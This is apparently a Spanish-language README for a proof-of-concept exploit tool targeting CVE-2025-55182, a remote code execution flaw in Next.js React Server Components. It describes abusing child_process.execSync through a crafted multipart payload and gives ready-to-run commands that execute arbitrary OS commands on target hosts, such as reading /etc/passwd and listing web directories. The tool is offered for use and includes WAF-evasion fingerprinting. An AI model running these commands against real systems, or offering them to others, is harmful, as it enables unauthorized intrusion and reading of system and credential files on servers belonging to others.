
POC-CVE-2025-55182
CVE-2025-55182 Advanced Scanner
Una utilidad de explotación completa para CVE-2025-55182 — Ejecución Remota de Código a través de Componentes del Servidor React en Next.js. El escáner crea automáticamente el payload multiparte y abusa de process.mainModule.require('child_process').execSync() para lograr la ejecución arbitraria de comandos del sistema operativo en instancias vulnerables.
Características
Generador de payload automático — no requiere codificación manual Ejecución de comandos con extracción limpia de STDOUT Detección automática de protocolo (se aplica https:// si falta) Decodificación correcta de URL + restauración de nuevas líneas Salida rica y coloreada para retroalimentación rápida al operador Huella de errores (500 / 403 / SSL / tiempo de espera / patrones WAF)
Instalación chmod +x scanner.sh
Uso
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
Opciones

Ejemplos
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
No dudes en contactar a mailto:[email protected]